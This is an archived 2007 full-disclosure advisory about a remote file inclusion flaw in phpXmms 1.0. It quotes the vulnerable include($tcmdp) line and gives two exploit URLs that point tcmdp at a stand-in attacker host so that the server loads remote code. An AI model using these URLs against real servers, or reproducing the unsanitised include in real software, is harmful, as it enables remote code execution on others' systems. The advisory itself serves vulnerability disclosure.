Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] Call Center Software - Remote Xss Post Exploit -

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Nabopoll Blind SQL Injection vulnerabilies

AdMentor Script Remote  SQL injection Exploit

From:	ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:	21.02.2007
Subject:	phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities

---------------------------------------------------------------------------------
----------------------------------

AYYILDIZ.ORG PreSents...


Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include($tcmdp);

---------------------------------------------------------------------------------
----------------------------------

Exploit:  phpxmmsb.php?tcmdp=http://attacker.txt?
            phpxmmst.php?tcmdp=http://attacker.txt?

---------------------------------------------------------------------------------
----------------------------------

Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG